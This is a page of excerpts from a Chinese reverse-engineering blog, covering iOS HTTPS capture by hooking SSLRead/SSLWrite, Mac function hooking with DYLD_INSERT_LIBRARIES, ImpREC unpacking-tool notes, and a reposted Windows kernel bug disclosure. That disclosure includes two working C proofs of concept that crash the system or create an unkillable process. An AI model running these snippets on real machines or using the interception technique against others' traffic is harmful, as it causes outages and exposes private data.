C/C++ – 第 2 页 – obaby@mars

iOS https(SSL/TLS)数据捕获

2013年8月19日 4 条评论

要捕获iPhone上的appstore的数据还真的没那么容易，以前介绍的那些使用代理手工导入证书的方法已经完全失效了，结果就是安装证书之后再打开appstore也无法正常的建立连接。按照我的分析其实是appstore在检测证书无效之后直接就没有发起任何的请求（可以通过wireshark抓包查看网络数据）
随之而来的是第二种方法，patch ssl证书校验函数，根据这个原理实现的有两个工具，一个是ssl kill switch，另外一个是trustme。原理都是一样的，并且也非常的简单，按照作者的说法是truestme实现的更底层一些。但是很不幸的是，结局是同样的悲哀的，在iOS6之后这个东西也是失效了。
其实我这里要说的方法也比较简单，如果阅读过上面两个工具的源代码（请自行搜索相关代码），并且理解mac os/iOS 下https实现的相关原理，那么也就自然的想到hook发送和接收函数的方法来捕获数据了。
需要关心的函数只有两个sslread和sslwrite：
代码:

SSLRead
Performs a normal application-level read operation.

OSStatus SSLRead (
SSLContextRef context,
void *data,
size_t dataLength,
size_t *processed
);
Parameters
context
An SSL session context reference.
data
On return, points to the data read. You must allocate this buffer before calling the function. The size of this buffer must be equal to or greater than the value in the dataLength parameter.
dataLength
The amount of data you would like to read.
processed
On return, points to the number of bytes actually read.

而需要关心的字段则就是那个data了，因而要想知道https数据的内容只要能够正常的获取到data字段的内容就行了，同样对于发送函数sslwrite也同样适用：
代码:

SSLWrite
Performs a normal application-level write operation.

OSStatus SSLWrite (
SSLContextRef context,
const void *data,
size_t dataLength,
size_t *processed
);
Parameters
context
An SSL session context reference.
data
A pointer to the buffer of data to write.
dataLength
The amount, in bytes, of data to write.
processed
On return, the length, in bytes, of the data actually written.

汇编『ASM』, 破解/汇编『Crack/Asm』

Symbol Type Viewer 1.0.0.6

2013年4月24日 7 条评论

Symbol Type Viewer is a tool which makes it possible to easily visualize the types which can be defined in the symbols of the modules of the systems Microsoft Windows 32/64bit. Moreover, it makes it possible to convert these informations for the C language (.h) and the disassembler IDA of DataRescue (.idc).

程序设计『Programing』

Open Sources

2013年4月17日没有评论

至于开源的东西，其实自己也蛮想做的。但是苦于技术水平不够，所以一直也没什么东西公布。刚开始的时候代码都是托管在Googlecode, 后来迁移到了github，但是苦于github不能创建私有项目，于是最后选择了bitbucket上，另外一个好处是可以绑定域名。于是以后有代码公布的话，可以访问这个网址访问http://code.h4ck.org.cn。

Mac OSX『Mac OS』, 苹果『iOS』

Hooking library calls on Mac using DYLD_INSERT_LIBRARIES

2013年4月10日没有评论

Mac offers a way to override functions in a shared library with DYLD_INSERT_LIBRARIES environment variable (which is similar to LD_PRELOAD on Linux). When you make a twin brother of a function that is defined in an existing shared library, put it in you a shared library, and you register your shared library name in DYLD_INSERT_LIBRARIES, your function is used instead of the original one. This is my simple test. Here I’ve replaced f() in mysharedlib.dylib with f() in openhook.dylib.

微软『Windows』, 程序设计『Programing』

ProcessIoPriority Bug (BSOD/Non-Killable Process)

2013年3月18日 2 条评论

//http://waleedassar.blogspot.com
//http://www.twitter.com/waleedassar

BSOD:
#define ProcessIoPriority               0x21
int main()
{
    unsigned long val=0xFFFFFFFF;
    int ret=ZwSetInformationProcess(GetCurrentProcess(),ProcessIoPriority,&val,0x4);
    if(ret<0) printf("Error %x\r\n",ret);
    ExitProcess(0);
    return 0;
}

Non-Killable Process:

#define ProcessIoPriority               0x21
int main()
{
    unsigned long val=0x8000F129;
    int ret=ZwSetInformationProcess(GetCurrentProcess(),ProcessIoPriority,&val,0x4);
    if(ret<0) printf("Error %x\r\n",ret);
    ExitProcess(0);
    return 0;
}

Description:
With the “ProcessInformationClass” parameter set to ProcessIoPriority 0x21, passing certain signed values e.g. 0xFFFFFFFF or 0x8000F129 in the variable pointed to by the “ProcessInformation” parameter to the ntdll “ZwSetInformationProcess” function can be abused to arbitrarily set certain bit flags of the corresponding “_EPROCESS” structure e.g. DefaultIoPriority: Pos 27, ProcessSelfDelete : Pos 30, or SetTimerResolutionLink: Pos 31.

Link:http://waleedassar.blogspot.tw/2013/02/kernel-bug-1-processiopriority.html

程序设计『Programing』

ImpREC lite v11 Source Code(Share)

2013年1月11日没有评论

News:
—–
ImpREC is back to public. This version can now support Windows 95 (Thanks to EliCZ,
Unknown One and ZigD for testing).
It has also been redesigned to support more import rebuilding schemes (relative calls for
example). The plugin interface has changed completely (using filemapping) and now supports
the ‘Exact Call’ feature. This last one has been linked with the ‘Create New IAT’. It will
be useful for all mangled schemes which annihilate completely or partially the IAT. The
‘AutoTrace’ is more stable because it will not use the Tracer Level2 anymore. A built-in
coloured disassembler/hew-viewer will help you to watch the redirected code. Then you
should not need the ASProtect plugin because of no more updates but it still is there as
example. Please take a look at <History.txt> for all details.

I hope you will enjoy this version like i did to make it,
Regards,

MackT/uCF.

v1.6 FINAL (PUBLIC VERSION)
—————————

– Misc

– Finally fixed the bug in the check for adding section (Thanks to Christoph)

v1.6 beta *PRIVATE*
——————-
– Tracers
– Tracer Level3
– Added EIP Log
– Misc
– Finally, support relative calls rebuild (not with the loader yet)
– Added a disassembler window for redirected code
– Added colour to all known imports (Thanks to Jeff Schering)
– Added a hex viewer (built with the disassembler)
– Fixed blink in RichEdit control
– Checkbox “OpCodes” is enable/disable depending on “Hex View”
(Thanks to Muffin)

程序设计『Programing』

VS 2012示例代码浏览器

2012年11月27日没有评论

安装地址：http://visualstudiogallery.msdn.microsoft.com/4934b087-e6cc-44dd-b992-a71f00a2a6df

亮点介绍

集成丰富的示例代码搜索

Visual Studio 示例代码浏览器和Visual Studio无缝集成。充分利用Visual Studio界面让你在开发过程中轻松搜索示例代码。譬如，当你在Visual Studio中编辑代码时，你可以选中一段API或代码段，敲击Alt+F1快捷键或右键选择Search Code Samples，便可针对所选择API搜索相关示例代码。